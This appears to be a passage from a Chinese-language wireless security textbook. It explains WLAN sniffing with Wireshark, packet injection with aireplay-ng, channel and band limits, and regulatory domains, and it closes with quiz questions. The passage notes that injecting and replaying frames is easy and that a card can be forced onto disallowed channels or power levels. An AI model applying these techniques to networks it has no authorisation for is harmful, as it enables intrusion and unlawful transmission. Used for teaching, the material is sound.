使用 WIreshark 进一步分析数据封包。你会注意 DHCP 请求由客户端生成,并且如果 DHCP 服务器可用,它会返回地址。之后你会发现 ARP 封包和其它协议的封包。这样来被动发现无线网络上的主机十分简单。能够看到封包记录,并重构出无线主机上的应用如何和网络的其余部分通信十分重要。Wireshark 所提供的有趣的特性之一,就是跟踪流的能力。这允许你一起查看多个封包,它们是相同连接中的 TCP 数据交换。
此外,尝试登陆 www.gmail.com 和其它流行站点并分析生成的数据流量。
我们会演示如何向无线网络中注入封包。
我们使用 aireplay-ng 工具来进行这个练习,它在 Kali 中自带。
遵循下列指南来开始:
我们刚刚使用 aireplay-ng,成功向我们的测试环境网络注入了封包。要注意我们的网卡将这些任意的封包注入到网络中,而不需要真正连接到无线接入点 Wireless Lab 。
我们会在之后的章节中详细了解封包注入。现在请探索一下 Aireplay-ng 工具用于注入封包的其它选项。你可以使用 Wireshark 监控空域来验证注入是否成功。
WLAN 通常在三种不同频率范围内工作:2.4 GHz,3.6 GHz 和 4.9/5.0 GHz。并不是所有 WIFI 网卡都全部支持这三种范围和相关的波段。例如,Alfa 网卡只支持 IEEE 802.11b/g。这就是说,这个网卡不能处理 802.11a/n。这里的关键是嗅探或注入特定波段的封包。你的 WIFI 网卡需要支持它。
另一个 WIFI 的有趣方面是,在每个这些波段中,都有多个频道。要注意你的 WIFI 网卡在每个时间点上只能位于一个频道。不能将网卡在同一时间调整为多个频道。这就好比车上的收音机。任何给定时间你只能将其调整为一个可用的频道。如果你打算听到其它的东西,你需要修改频道。WLAN 嗅探的原则相同。这会产生一个很重要的结论 -- 我们不能同时嗅探所有频道,我们只能选择我们感兴趣的频道。这就是说,如果我们感兴趣的接入点的频道是 1,我们需要将网卡设置为频道 1。
虽然我们在上面强调了 WLAN 嗅探,注入的原则也相同。为了向特定频道注入封包,我们需要将网卡调整为特定频道。
让我们现在做一些练习,设置网卡来制定频道或进行频道跳跃,设置规范域以及功率等级,以及其它。
仔细遵循以下步骤:
我们知道了,无线嗅探和封包注入依赖于硬件的支持。这即是说我们只能处理网卡支持的波段和频道。此外,无线网卡每次只能位于一个频道。这说明了我们只能一次嗅探或注入一个频道。
WIFI 的复杂性到这里并没有结束。每个国家都有自己的未授权的频谱分配策略。这规定了允许的功率等级和频谱的用户。例如,FCC 规定,如果你在美国使用 WLAN,你就必须遵守这些规定。在一些国家,不遵守相关规定会收到惩罚。
现在让我们看看如何寻找默认的规范设置,以及如何按需修改它们。
仔细遵循以下步骤:
每个国家都有用于未授权无线波段的自己的规范。当我们将规范域设置为特定国家时,我们的网卡会遵循允许的频道和指定的功率等级。但是,嗅探网卡的规范域,来强制它工作在不允许的频道上,以及在高于允许值的功率等级上传输数据相当容易。
查看你可以设置的多种参数,例如频道、功率、规范域,以及其它。在 Kali 上使用 iw 命令集。这会让你深刻了解在不同国家的时候如何配置网卡,以及修改网卡设置。
Q1 哪种帧类型负责在 WLAN 中的验证?
Q2 使用 airmon-mg 在 wlan0 上创建的第二个监控器模式接口的名字是什么?
Q3 用于在 Wireshark 中查看非信标的过滤器表达式是什么?
这一章中,我们对 WLAN 协议进行了一些重要的观察。
管理、控制和数据帧是未加密的,所以监控空域的人可以轻易读取。要注意数据封包载荷可以使用加密来保护,使其更加机密。我们在下一章讨论它们。
我们可以通过将网卡设置为监控模式来嗅探附近的整个空域。
由于管理和控制帧没有完整性保护,使用例如 aireplay-ng 的工具通过监控或照旧重放它们来注入封包非常容易。
未加密的数据封包也可以被修改和重放到网络中。如果封包加密了,我们仍然可以照旧重放它们,因为 WLAN 设计上并没有保护封包重放。
下一章中,我们会看一看用于 WLAN 的不同验证机制,例如 MAC 过滤和共享验证,以及其它。并且通过实际的演示来理解多种安全缺陷。